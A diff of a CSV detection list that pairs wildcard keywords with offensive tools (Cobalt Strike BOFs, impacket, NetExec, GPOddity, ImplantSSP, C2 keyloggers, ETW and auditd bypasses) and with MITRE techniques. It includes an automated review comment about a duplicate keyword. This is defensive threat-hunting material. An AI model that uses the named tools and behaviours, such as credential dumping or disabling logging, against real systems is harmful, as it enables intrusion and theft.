APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","403","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z"
+"*/ysoserial/*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","1","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z"
 "*/zejius/2HZG41Zw/6Vtmo6w4yQ5tnsBHms64.php*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z"
 "*/zejius/2HZG41Zw/fJsnC6G4sFg2wsyn4shb.bin*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z"
 "*/zejius/5GPR0iy9/6Vtmo6w4yQ5tnsBHms64.php*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z"
 "*/zejius/5GPR0iy9/fJsnC6G4sFg2wsyn4shb.bin*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z"
 "*/zerologon.cna*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF zerologon exploit","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ZeroLogon-BOF","1","1","N/A","10","10","148","40","2022-04-25T11:22:45Z","2020-09-17T02:07:13Z"
-"*/zerologon.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6330","762","2023-10-03T21:06:53Z","2015-08-30T07:22:51Z"
+"*/zerologon.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z"
+"*/zerologon.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
 "*/zhzyker/CVE-2020-5902*","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://github.com/zhzyker/CVE-2020-5902/","1","0","N/A","N/A","1","13","8","2020-07-08T04:10:12Z","2020-07-08T04:02:07Z"
 "*/zsh_executor/*.go*","offensive_tool_keyword","mythic","mythic C2 agent","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/freyja/","1","1","N/A","10","10","11","6","2023-06-30T16:35:47Z","2022-09-28T17:20:04Z"
 "*/zwjjustdoit/cve-2022-23131*","offensive_tool_keyword","POC","POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0002 - TA0006 - TA0009","N/A","N/A","Exploitation tools","https://github.com/zwjjustdoit/cve-2022-23131","1","1","N/A","N/A","1","0","3","2022-02-21T04:55:57Z","2022-02-21T02:42:23Z"
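Review bot: The added NetExec row reuses the keyword `*/zerologon.py*`, which the monkey row directly above it already carries, so a match on this pattern cannot tell the two tools apart and any consumer that keys or de-duplicates on the `keyword` column will keep the metadata of only one of them. Qualifying the new keyword with the tool's own directory (for example `*/<netexec-module-dir>/zerologon.py*`, placeholder) would keep the two detections separable. The same row sets `metadata_category` to `Credential Access` while its `metadata_tool_tactics` value `TA0007 - TA0003 - TA0002 - TA0001` contains no `TA0006`, so category-based and tactic-based filtering will disagree; one of the two fields should be corrected. The NetExec row added in the next hunk (the `*[!] Dumping the ntds ...` keyword) carries the same category/tactics pair.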
@@ -5879,56 +5949,57 @@
 "*:\Users\Public\Music\*.dll*","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","0","N/A","10","2","196","34","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z"
 "*:'123pentest'*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
 "*:8999/Payloads/*","offensive_tool_keyword","primusC2","another C2 framework","T1090 - T1071","TA0011 - TA0002","N/A","N/A","C2","https://github.com/Primusinterp/PrimusC2","1","1","N/A","10","10","42","4","2023-08-21T04:05:48Z","2023-04-19T10:59:30Z"
-"*:9090*/api/v1.0/relays*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z"
-"*?convert_ccache_to_kirbi*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z"
-"*?convert_kirbi_to_ccache*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z"
+"*:9090*/api/v1.0/relays*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z"
+"*?convert_ccache_to_kirbi*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z"
+"*?convert_kirbi_to_ccache*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z"
 "*?PSAmsi*PSReflect.ps1*","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","1","N/A","7","4","382","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z"
 "*?sample_sliver.json*","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","0","N/A","10","10","234","28","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z"
 "*[!] Failed to enumerate Credman:*","offensive_tool_keyword","SharpAzbelt","This is an attempt to port Azbelt by Leron Gray from Nim to C#. It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources","T1082 - T1003 - T1027 - T1110 - T1078","TA0006 - TA0007 - TA0005 - TA0004 - TA0003","N/A","N/A","Discovery - Collection","https://github.com/redskal/SharpAzbelt","1","0","N/A","8","1","23","6","2023-09-21T21:47:32Z","2023-09-21T21:44:03Z"
-"*[!] Failed to download legitimate GPO from SYSVOL (dc_ip:*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","90","6","2023-09-10T10:59:24Z","2023-09-01T08:13:25Z"
-"*[!] Failed to write malicious scheduled task to downloaded GPO. Exiting*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","90","6","2023-09-10T10:59:24Z","2023-09-01T08:13:25Z"
+"*[!] Dumping the ntds can crash the DC on Windows Server 2019. Use the option*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*[!] Failed to download legitimate GPO from SYSVOL (dc_ip:*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z"
+"*[!] Failed to write malicious scheduled task to downloaded GPO. Exiting*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z"
 "*[#] Ready For ETW Patch.*","offensive_tool_keyword","Fuck-Etw","Bypass the Event Trace Windows(ETW) and unhook ntdll.","T1070.004 - T1055.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/unkvolism/Fuck-Etw","1","0","N/A","10","1","63","9","2023-09-29T21:19:10Z","2023-09-25T18:59:10Z"
-"*[*] Downloading the legitimate GPO from SYSVOL*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","90","6","2023-09-10T10:59:24Z","2023-09-01T08:13:25Z"
-"*[*] Injecting malicious scheduled task into downloaded GPO*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","90","6","2023-09-10T10:59:24Z","2023-09-01T08:13:25Z"
-"*[*] Smuggling in HTML*","offensive_tool_keyword","AutoSmuggle","Utility to craft HTML or SVG smuggled files for Red Team engagements","T1027.006 - T1598","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/surajpkhetani/AutoSmuggle","1","0","N/A","9","2","141","21","2023-09-02T08:09:50Z","2022-03-20T19:02:06Z"
-"*[*] Smuggling in SVG*","offensive_tool_keyword","AutoSmuggle","Utility to craft HTML or SVG smuggled files for Red Team engagements","T1027.006 - T1598","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/surajpkhetani/AutoSmuggle","1","0","N/A","9","2","141","21","2023-09-02T08:09:50Z","2022-03-20T19:02:06Z"
-"*[*] Updating downloaded GPO version number to ensure automatic GPO application*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","90","6","2023-09-10T10:59:24Z","2023-09-01T08:13:25Z"
+"*[*] Downloading the legitimate GPO from SYSVOL*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z"
+"*[*] Injecting malicious scheduled task into downloaded GPO*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z"
+"*[*] Smuggling in HTML*","offensive_tool_keyword","AutoSmuggle","Utility to craft HTML or SVG smuggled files for Red Team engagements","T1027.006 - T1598","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/surajpkhetani/AutoSmuggle","1","0","N/A","9","2","142","21","2023-09-02T08:09:50Z","2022-03-20T19:02:06Z"
+"*[*] Smuggling in SVG*","offensive_tool_keyword","AutoSmuggle","Utility to craft HTML or SVG smuggled files for Red Team engagements","T1027.006 - T1598","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/surajpkhetani/AutoSmuggle","1","0","N/A","9","2","142","21","2023-09-02T08:09:50Z","2022-03-20T19:02:06Z"
+"*[*] Updating downloaded GPO version number to ensure automatic GPO application*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z"
 "*[-] failed to spawn shell: %s*","offensive_tool_keyword","EQGR","Equation Group hack tool leaked by ShadowBrokers- file elgingamble Local exploit for the public prctl core dump vulnerability in recent Linux kernels","T1213.001 - T1203.001","TA0001 - TA0003","N/A","N/A","Shell spawning","https://fdik.org/EQGRP/Linux/doc/old/etc/user.tool.elgingamble.COMMON","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "*[-] kernel not vulnerable*","offensive_tool_keyword","EQGR","Equation Group hack tool leaked by ShadowBrokers- file elgingamble Local exploit for the public prctl core dump vulnerability in recent Linux kernels.","T1213.001 - T1203.001","TA0001 - TA0003","N/A","N/A","Shell spawning","https://fdik.org/EQGRP/Linux/doc/old/etc/user.tool.elgingamble.COMMON","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "*[-] Seems like we killed auditd. Ooopsie :D*","offensive_tool_keyword","apollon","evade auditd by writing /proc/PID/mem","T1054.001 - T1055.001 - T1012","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/codewhitesec/apollon","1","0","N/A","8","1","13","5","2023-08-21T05:43:36Z","2023-07-31T11:55:43Z"
-"*[+] Adding your DLL to the LSA Security Packages registry key*","offensive_tool_keyword","ImplantSSP","Installs a user-supplied Security Support Provider (SSP) DLL on the system which will be loaded by LSA on system start","T1547.008 - T1073.001 - T1055.001","TA0003 - TA0005","N/A","N/A","Persistence - Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/ImplantSSP","1","0","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z"
+"*[+] Adding your DLL to the LSA Security Packages registry key*","offensive_tool_keyword","ImplantSSP","Installs a user-supplied Security Support Provider (SSP) DLL on the system which will be loaded by LSA on system start","T1547.008 - T1073.001 - T1055.001","TA0003 - TA0005","N/A","N/A","Persistence - Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/ImplantSSP","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z"
 "*[+] Attack aborted. Exiting*","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1110.003 - T1098 - T1059 - T1075","TA0001 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/ShorSec/ShadowSpray","1","0","N/A","7","5","408","72","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z"
-"*[+] Attempting to call the target EXE from the mock directory*","offensive_tool_keyword","MockDirUACBypass","Creates a mock trusted directory C:\Windows \System32\ and moves an auto-elevating Windows executable into the mock directory. A user-supplied DLL which exports the appropriate functions is dropped and when the executable is run - the DLL is loaded and run as high integrity.","T1574.002 - T1547.008 - T1059.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/MockDirUACBypass","1","0","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z"
+"*[+] Attempting to call the target EXE from the mock directory*","offensive_tool_keyword","MockDirUACBypass","Creates a mock trusted directory C:\Windows \System32\ and moves an auto-elevating Windows executable into the mock directory. A user-supplied DLL which exports the appropriate functions is dropped and when the executable is run - the DLL is loaded and run as high integrity.","T1574.002 - T1547.008 - T1059.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/MockDirUACBypass","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z"
 "*[+] auditd patched successfully*","offensive_tool_keyword","apollon","evade auditd by writing /proc/PID/mem","T1054.001 - T1055.001 - T1012","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/codewhitesec/apollon","1","0","N/A","8","1","13","5","2023-08-21T05:43:36Z","2023-07-31T11:55:43Z"
 "*[+] Back to C&C Console*","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","N/A","10","10","31","17","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z"
-"*[+] Bof replay:*","offensive_tool_keyword","Nightmangle","ightmangle is post-exploitation Telegram Command and Control (C2/C&C) Agent","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/1N73LL1G3NC3x/Nightmangle","1","0","N/A","10","10","72","10","2023-09-26T19:21:31Z","2023-09-26T18:25:23Z"
-"*[+] Creating mock directories*","offensive_tool_keyword","MockDirUACBypass","Creates a mock trusted directory C:\Windows \System32\ and moves an auto-elevating Windows executable into the mock directory. A user-supplied DLL which exports the appropriate functions is dropped and when the executable is run - the DLL is loaded and run as high integrity.","T1574.002 - T1547.008 - T1059.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/MockDirUACBypass","1","0","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z"
+"*[+] Bof replay:*","offensive_tool_keyword","Nightmangle","ightmangle is post-exploitation Telegram Command and Control (C2/C&C) Agent","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/1N73LL1G3NC3x/Nightmangle","1","0","N/A","10","10","73","10","2023-09-26T19:21:31Z","2023-09-26T18:25:23Z"
+"*[+] Creating mock directories*","offensive_tool_keyword","MockDirUACBypass","Creates a mock trusted directory C:\Windows \System32\ and moves an auto-elevating Windows executable into the mock directory. A user-supplied DLL which exports the appropriate functions is dropped and when the executable is run - the DLL is loaded and run as high integrity.","T1574.002 - T1547.008 - T1059.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/MockDirUACBypass","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z"
 "*[+] Deobfuscated dump saved in file decrypted.dmp*","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access - Data Exfiltration","https://github.com/tastypepperoni/PPLBlade","1","0","N/A","10","4","324","36","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z"
-"*[+] Enumerating driver services...*","offensive_tool_keyword","DriverQuery","Collect details about drivers on the system and optionally filter to find only ones not signed by Microsoft","T1124 - T1057 - T1082","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/DriverQuery","1","0","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z"
+"*[+] Enumerating driver services...*","offensive_tool_keyword","DriverQuery","Collect details about drivers on the system and optionally filter to find only ones not signed by Microsoft","T1124 - T1057 - T1082","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/DriverQuery","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z"
 "*[+] ETW Patched, No Logs No Crime !*","offensive_tool_keyword","Fuck-Etw","Bypass the Event Trace Windows(ETW) and unhook ntdll.","T1070.004 - T1055.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/unkvolism/Fuck-Etw","1","0","N/A","10","1","63","9","2023-09-29T21:19:10Z","2023-09-25T18:59:10Z"
-"*[+] Generated XOR key: *","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","0","N/A","10","4","337","49","2023-09-28T20:56:28Z","2023-08-08T11:30:34Z"
+"*[+] Generated XOR key: *","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","0","N/A","10","4","347","50","2023-10-04T09:27:32Z","2023-08-08T11:30:34Z"
 "*[+] Generating base64 encoded PowerShell script*","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","0","N/A","7","2","185","38","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z"
 "*[+] Keylogger started*","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","N/A","10","10","31","17","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z"
 "*[+] Keylogger stopped*","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","N/A","10","10","31","17","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z"
 "*[+] keystrokes dump from agent*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z"
 "*[+] Opened Process Token Sucessufully!*","offensive_tool_keyword","BesoToken","A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).","T1134 - T1003.002","TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/OmriBaso/BesoToken","1","0","N/A","10","1","91","11","2022-11-23T10:45:07Z","2022-11-21T01:07:51Z"
-"*[+] Registry key set. DLL will be loaded on reboot*","offensive_tool_keyword","ImplantSSP","Installs a user-supplied Security Support Provider (SSP) DLL on the system which will be loaded by LSA on system start","T1547.008 - T1073.001 - T1055.001","TA0003 - TA0005","N/A","N/A","Persistence - Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/ImplantSSP","1","0","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z"
-"*[+] Safety checks passed. Implanting your DLL*","offensive_tool_keyword","ImplantSSP","Installs a user-supplied Security Support Provider (SSP) DLL on the system which will be loaded by LSA on system start","T1547.008 - T1073.001 - T1055.001","TA0003 - TA0005","N/A","N/A","Persistence - Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/ImplantSSP","1","0","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z"
